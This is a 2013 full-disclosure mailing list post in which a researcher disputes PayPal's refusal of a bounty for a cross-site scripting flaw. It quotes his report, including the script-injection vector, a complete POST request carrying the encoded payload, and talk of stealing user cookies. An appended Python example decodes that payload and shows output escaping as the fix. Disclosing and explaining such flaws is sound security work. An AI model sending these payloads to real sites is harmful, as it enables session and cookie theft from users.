List: full-disclosure
Subject: [Full-disclosure] PayPal Bug Bounty Controversy - I found the XSS first: They still didn't pay me
From: Shubham Shah <shahshubham369 () gmail ! com>
Date: 2013-05-29 14:38:16
Message-ID: 51A612D8.9080109 () gmail ! com
Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same
field that Kugler reported, on the same domain of "paypal.com"* -
However, I too did not receive a bug bounty.
My name is Shubham Shah, also a security researcher. And, coincidentally but similarly to Robert Kugler, I too found a cross-site scripting vulnerability on PayPal's "sitewide-search" module. My exploit was similar to his: it affected the same parameters, except I had used an alternate vector, after fiddling with the search system for some time.
The real controversy, however, is that I am *under 18 years old* and I have, in the past, received money from their program under my older sibling's PayPal account, with permission. When I reported the XSS, pretty much the same as Kugler reported, I was "not eligible for a bounty" because "Another researcher already discovered the bug". Please take a look at the attached emails and screenshots.
Here is what I sent to the Site Security team via their PGP portal:
====================================================
To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/*. This XSS vulnerability is a POST type, on the affected script "searchscr?cmd=_sitewide-search".
Affected domains: https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.
The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does not execute on Chrome, but it is possible to create a custom vector to do so. If needed, I can create such a vector.
XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] in front of any HTML or script injection (without the square brackets)
This exploit has the capability of stealing a large number of user cookies in a short period of time with cookie stealers. If needed I can also provide a PoC for this. This can be done stealthily and would cause major mayhem if exploited!
Here are some proof of concept images:
http://pasteboard.co/2lU54Wuj.png (PNG file hosted on pasteboard.co) - document.cookie xss on firefox
Here are my personal HTTP headers for making this exploit execute:
POST https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search 1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countstr_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8
Thank you for your time in reading this, Shubham Shah
====================================================
Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message
On 05/13/2013 7:47 AM I got told by paypal that:
====================================================
Hi Shubham,
We regret to inform you that your bug submission was not eligible for a bounty for the following reason. Another researcher already discovered the bug.
Thank you for your participation. We take pride in keeping PayPal the safer place for online payment.
Thank you,
PayPal Security Team
====================================================
Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print
screen of the far right side, I included the barebones - print version
of the message - so others can verify the date I received the response.
Thanks for reading through,
I actually didn't get anything from PayPal similar to Robert, but I was
able to report the vulnerability 8 days earlier than Robert - and still
did not receive any acknowledgement.
Frankly, I was okay with it and moved on. I do not actually have much against the bounty, as I have been paid numerous times. PayPal has honoured many of my vulnerabilities. However, I can tell you that recently none of my security submissions have been honoured - they state that all my newer submissions have already been reported - I have no actual way of verifying if they have or not, so I just move on and continue pentesting with spirit.
Also, Robert, I am amazed by your work done with security regarding
Mozilla! They were awesome finds! Solid stuff man, I hope one day that I
can move onto learning more about application security.
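An added example, not part of Shah's post and not PayPal's code: it decodes a POST body built from the parameter names in the report above (the vector is the one reported) and shows why the leading '" matters when a search term is echoed into a quoted HTML attribute, beside the context-aware output encoding that neutralises it. The two render functions are an assumed, hypothetical search-results template, not PayPal's real page; the body string is constructed here.

```python
import html
from urllib.parse import parse_qs

# Constructed POST body using the parameter names quoted in the report above,
# shortened to the fields that matter. Not a captured request.
SAMPLE_BODY = (
    "locale_val=en_AU"
    "&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E"
    "&countstr_val=AU&serverame_val=www.paypal.com"
    "&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E"
    "&buttonSearch=Search&form_charset=UTF-8"
)


def query_from_body(body: str, param: str = "queryString") -> str:
    """Decode a form-urlencoded POST body and return one parameter's first value.

    parse_qs percent-decodes and turns '+' into a space, so the reported
    vector comes back exactly as the browser submitted it.
    """
    params = parse_qs(body, keep_blank_values=True)
    return params.get(param, [""])[0]


def render_unsafe(query: str) -> str:
    """Hypothetical vulnerable template (assumption, not the real page).

    The query is echoed raw into a quoted value="" attribute and into text.
    A leading ' or " closes the attribute value early, which is why the
    reported vector puts '" in front of the <script> tag.
    """
    return (
        f'<input type="text" name="queryString" value="{query}">'
        f"<p>Search results for {query}</p>"
    )


def render_safe(query: str) -> str:
    """Same template with context-aware output encoding.

    html.escape(..., quote=True) encodes & < > " and ', so the reflected
    value can neither terminate the attribute nor open a new tag.
    """
    encoded = html.escape(query, quote=True)
    return (
        f'<input type="text" name="queryString" value="{encoded}">'
        f"<p>Search results for {encoded}</p>"
    )


def has_raw_script_tag(rendered: str) -> bool:
    """Minimal check a response-side test or proxy rule could apply:
    an unencoded <script opening tag appearing in the rendered page."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    q = query_from_body(SAMPLE_BODY)
    print("decoded vector:", q)
    print("unsafe render leaks a script tag:", has_raw_script_tag(render_unsafe(q)))
    print("safe render leaks a script tag:  ", has_raw_script_tag(render_safe(q)))
```

The encoding step is the fix that matters regardless of which browser the original vector happened to fire in: once the reflected value is escaped for the context it lands in, the '" prefix is just two harmless entities.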
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/